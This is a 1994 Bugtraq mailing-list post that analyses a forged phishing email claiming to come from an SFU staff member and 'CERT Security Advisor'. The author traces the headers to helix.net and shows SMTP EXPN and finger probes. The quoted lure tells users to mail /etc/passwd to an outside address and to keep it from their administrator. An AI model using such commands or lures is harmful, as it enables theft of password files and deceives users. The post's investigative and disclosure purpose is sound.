Stupid crackers exploiting stupid users
der Mouse (mouse@Collatz.McRCIM.McGill.EDU)
Sun, 23 Oct 1994 08:26:14 -0400
> From: "Douglas R. Floyd" <dfloyd@paris.eng.utsa.edu>
> Message-Id: <9410230054.ZM10281@paris.eng.utsa.edu>
> Date: Sun, 23 Oct 1994 00:54:14 -0500
> To: bugtraq@crimelab.com
> Subject: Another request for passwords
> I got this in the mail today (10-23).
> Seems like someone is knocking on io.com now.
This appears to be a forged attempt to mailbomb someone else. If you
read the headers carefully, you'll see that SFU appears in only the
From: header - the letter comes from helix.net and has a helix.net
Message-ID. And when I looked at vanepp@sfu.ca....
[Thunder] 2> telnet whistler.sfu.ca smtp
Trying 142.58.103.1 ...
Connected to whistler.sfu.ca.
Escape character is '^]'.
220-whistler.sfu.ca Sendmail 8.6.8/SFU-2.6H ready at Sun, 23 Oct 1994
05:10:36 -0700
220 ESMTP spoken here
expn vanepp
503 I demand that you introduce yourself first
(Hmmm, well, shrug-okay...)
helo thunder.mcrcim.mcgill.edu
250 whistler.sfu.ca Hello xxxx@xxxx.xxxx.xxxx [xxx.xxx.x.xx], pleased to meet you
expn vanepp
250 Peter Van Epp <vanepp@whistler.sfu.ca>
quit
221 whistler.sfu.ca closing connection
Connection closed by foreign host.
Okay, Peter Van Epp exists.
[Thunder] 3> finger vanepp@whistler.sfu.ca
[whistler.sfu.ca]
X.500 Finger Service...
One exact match found for "vanepp":
"Peter Van Epp, Computing Services, Simon Fraser University"
Also known as:
Peter Van Epp
Mailbox Information:
internet : vanepp@sfu.ca
internet : peter_van_epp@sfu.ca
User Class:
staff
Computing Services? "staff"? A staff person at SFU surely knows
better than to send out this piece of stupidity, especially since "expn
root" informs me that vanepp is one of nine people who get root's mail.
So I think someone on helix.net originated this, probably the person
responsible for the first piece of stupidity. What vanepp has to do
with it I have trouble imagining; I would suspect that sfu.ca had been
cracked and vanepp's .forward file replaced to point to the real
culprit, but EXPN and VRFY on whistler's SMTP server don't give me that
impression.
I suppose it's _possible_ that Peter Van Epp _is_ the person
responsible and that the mail was forged from his account on helix.net,
but that seems extremely unlikely.
I'm sending a copy to root@sfu.ca so that (a) vanepp probably gets it,
and (b) if vanepp's mail is being stolen somehow that I can't see
through VRFY and EXPN, the other roots there can deal with it.
For those who haven't yet seen it, here's the message as quoted by
dfloyd:
> BEGIN FUNKY MESSAGE --------
>
> From vanepp@sfu.ca Sun Oct 23 00:00:56 1994
> Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
> (931110.SGI/930416.SGI.AUTO)
> for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
> Received: from trance.helix.net
> by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
> id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
> From: vanepp@sfu.ca
> Received: from (helix.net [142.231.37.2]) by trance.helix.net
> (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
> dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
> Message-Id: <199410230433.VAA07859@trance.helix.net>
> Date: Sat, 22 Oct 1994 14:22:25
> To: dfloyd@pentagon.io.com
> Subject: Very Important
> Status: RO
>
> Dear user,
>
> It is imperative that I attain your /etc/passwd file
> immediately. It is for security reasons. You can mail
> it to me by typing:
>
> mail vanepp@sfu.ca < /etc/passwd
>
> Do not tell your system administrator. I am
> conducting an investigation on your system. Thank you
>
> Your identity will be kept confidential. I guarantee it
>
> Thank you for your cooperation.
>
> Peter Van Epp Technical Systems Operations
> CERT Security Advisor
> vanepp@sfu.ca
>
>
> END FUNKY MESSAGE -----
der Mouse
mouse@collatz.mcrcim.mcgill.edu